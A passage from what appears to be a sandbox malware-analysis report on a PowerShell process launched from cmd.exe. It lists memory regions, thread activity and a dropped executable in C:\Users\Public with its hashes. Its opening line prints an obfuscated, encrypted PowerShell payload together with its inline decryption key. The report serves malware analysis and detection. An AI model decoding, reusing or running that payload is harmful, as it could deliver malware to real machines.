YQAzAGYAMAA3AGIAOABkAGYANwA5ADkAZgAyADUAMwAxAGIAOQA3ADYANQA1AGIANABlAGIAMAA3ADMAMwBmAGYANwA0AGYAOQBlADgAZQBkAGQANgA2ADcAOABmADcAZABmADYAYgAzADIAMwA0ADEAMQA4ADkAYwBmADMAZQBmADIANQAwADYAYwAyAGUAZgA4AGQAOQBhADcAMAA0ADkANwBmAGIANQBjADUANwAzADMAZgBlADcAZAAyAGMAMQBhADgANgA0ADgAZQBmAGMAYQAzADQAMwBkADUAMgA5AGYANwA5AGUANQAwADkAZQA5ADIAZQAyADMAMQAyADkANQA2AGEAZABhADQAZAAyADIAZAAxAGUAOAAzAGQANwBlAGMAZgA0ADMANQA4AGUAZgBjAGMANAA2ADcAYgA5ADYAOQAyAGYAMgAxAGIAOQA2ADkAOQA3ADYAZgAwADUAZgBhAGUANABiADgANQA4ADQAMgA0ADMAMABmAGIAZAA4ADAANgAzAGUAOAAxAGYAYgA3AGUAMQA4AGUANgA5ADEAZgBiADUAYQA1AGMAOABjADAAMwBjAGIAOQA4ADUANABlADkAOAA2ADMAZgBjAGMAYwBkAGEAYwA0ADMAZAA2ADMAZQAyADcAYwAyAGIANABlAGEAMQBlAGMANwAyADkAOABjADcAYwAxADUAZgAxADYANgBkADkAYwA1AGMAYgBiADkAOQBjAGQAYwA2AGIANgBhADQAYwA1ADMAMQAzAGUAMAAzAGEAYQA3AGEANgA2AGUAZQBmADMAYQBmADUANwA0ADUAZgA1ADMAMAAwADUAZAA4ADQAOQA0AGMAYwBlADQAYgA1ADQANAA0AGEAMQA1ADMAOQBiADUAZAA5ADQAMQBlAGUANwAyAGUAOQA3ADQANQBiAGEANwA4ADcANQAzADMANwA1ADMAYQBmAGQAYwBiADMAYwA2AGMAOAAxAGMAYwA5AGUAOAAwAGMAZQBmAGEANgA3AGIAMQAyAGEAMQA5AGEANwA2AGIAMwA4AGUAMgA1AGYANQBmADgAZAA2ADcANgBkAGQAMAA0ADMAMAA3ADkAOAA3ADQAMwAzADAAYgAwADgAZgBhADQAMgAyADcAZgAwADIAYgA2ADgAOAA1ADgAZAA2AGEAYQAyAGIAOABiADMANAAzAGIAOQA1ADAAMAAyAGQANQBiADAAMgBkADUAYgA3ADcAZQAxADIAOQAwADcANwAwAGUAMgBiADcANAAxAGYAZgA3ADkAMwBjADEAOAAxADEAOQA3AGMAZgBiADIANgA4ADEAZgBkADIAOABmADcAZQA3ADUAOAA5AGQAYwA3ADUAZAAzADAAOQBhAGIANwBmAGIAMQBlAGIAZgAxADEAYQBiADMAZQAxAGUAMAA4ADEANwA2ADAAOQAyAGIAMwBlADAAMABhADIAOQBiADUAYgBhADkAYwA0AGUAOQA0ADcAZgAzADYAZQAyADAAYwBkADEAMgA4ADIAMABlAGMAZgAzADIANwBkAGIAOQBjADYAYwA5ADQAYwAzADIAMgBkADcAZgA2AGEAMgA4ADEAOAAyADIAZAA0ADMAMgBmADUAMABlADkAYwAwAGUANwBjAGIANwAwAGMAYgAzAGMAZQBiAGQAYgBiAGUAYwA3ADQANwA3ADIAMwAzADUA' | CoNveRTto-seCURestrING -Ke (222..207)) ) ))) |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb60 |
| Parent PID | 0xb48 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B64
0x
B68
0x
B6C
0x
B70
0x
B74
0x
B78
0x
BB8
0x
BC4
0x
BC8
0x
BCC
0x
8FC
0x
924
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x00170000 | 0x00173fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x00180000 | 0x0019ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00330000 | 0x0035ffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x00360000 | 0x00363fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00370000 | 0x003d5fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x00667fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x00670fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00682fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0069ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x01c2ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c30000 | 0x01c30000 | 0x01d2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01d5ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01deffff | Private Memory | Readable, Writable |
|
|
|
- |
| l_intl.nls | 0x01df0000 | 0x01df2fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01e7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001e80000 | 0x01e80000 | 0x01f5efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f60fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01ff0000 | 0x022befff | Memory Mapped File | Readable |
|
|
|
- |
| kernelbase.dll.mui | 0x022c0000 | 0x0237ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x023fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002400000 | 0x02400000 | 0x027f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x028fffff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x02900000 | 0x02904fff | Memory Mapped File | Readable |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x02910000 | 0x02917fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000002920000 | 0x02920000 | 0x02920fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x029affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029b0000 | 0x029b0000 | 0x02ab0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002ac0000 | 0x02ac0000 | 0x02ac0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002ac0000 | 0x02ac0000 | 0x02ad0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02b7ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| sortkey.nlp | 0x02b80000 | 0x02bc0fff | Memory Mapped File | Readable |
|
|
|
- |
| mscorrc.dll | 0x02bd0000 | 0x02c23fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02caffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cd0000 | 0x02cd0000 | 0x02cdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ce0000 | 0x02ce0000 | 0x1acdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001ace0000 | 0x1ace0000 | 0x1b3affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b3b0000 | 0x1b3b0000 | 0x1b4affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000001b500000 | 0x1b500000 | 0x1b57ffff | Private Memory | Readable, Writable |
|
|
|
- |
| system.management.automation.dll | 0x1b580000 | 0x1b861fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74a50000 | 0x74b18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| powershell.exe | 0x13f830000 | 0x13f8a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fede530000 | 0x7fede6c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x7fede6d0000 | 0x7fede83bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.xml.ni.dll | 0x7fede840000 | 0x7fedeee4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedeef0000 | 0x7fedef2dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedef30000 | 0x7fedf047fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedf050000 | 0x7fedf265fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.transactions.ni.dll | 0x7fedf270000 | 0x7fedf354fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fedf360000 | 0x7fedf409fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fedf410000 | 0x7fedf478fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.core.ni.dll | 0x7fedf480000 | 0x7fedf7adfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fedf7b0000 | 0x7fee030cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee0310000 | 0x7fee03c1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x7fee03d0000 | 0x7fee0df2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee0f70000 | 0x7fee1e4bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x7fee1e50000 | 0x7fee27ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x7fee4f00000 | 0x7fee4f98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x7fee4fa0000 | 0x7fee500efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fef1db0000 | 0x7fef1de1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7fef55d0000 | 0x7fef55dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x7fef55e0000 | 0x7fef5613fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shfolder.dll | 0x7fef5e80000 | 0x7fef5e86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7fef6d70000 | 0x7fef6deffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7fef6df0000 | 0x7fef6dfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7fef8020000 | 0x7fef8076fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefab30000 | 0x7fefab3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7fefab60000 | 0x7fefab78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7fefaf00000 | 0x7fefaf2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefb790000 | 0x7fefb7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefb7f0000 | 0x7fefb91bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefb970000 | 0x7fefbb63fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc000000 | 0x7fefc00bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7fefc1e0000 | 0x7fefc1fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefc430000 | 0x7fefc476fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefc730000 | 0x7fefc746fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7fefcc30000 | 0x7fefcc52fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefcd30000 | 0x7fefcd3efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefce40000 | 0x7fefce4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefcf60000 | 0x7fefcf79fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd0f0000 | 0x7fefd125fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefd450000 | 0x7fefe1d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefe1e0000 | 0x7fefe3e2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x7fefe400000 | 0x7fefe451fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe590000 | 0x7fefe600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefe7b0000 | 0x7fefe7cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe7e0000 | 0x7fefe90cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7fefe910000 | 0x7fefe9e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7fefeb70000 | 0x7fefed46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7fefee20000 | 0x7fefeeb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff120000 | 0x7feff1fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 75 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\public\229393.exe | 2.73 MB |
MD5:
f2eaec8a0c979bc5cc9b6e539e5b53b3
SHA1: ac6b1d839c34bfdef50e9f864ed956b5aeafba1a SHA256: 4585b82d8a7d67d25405f4bc388070ff3d6e674d964c8eb6b25cb87b786f4ad3 |
|
|
Threads
Thread 0xb64
556
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| User | Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
13 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
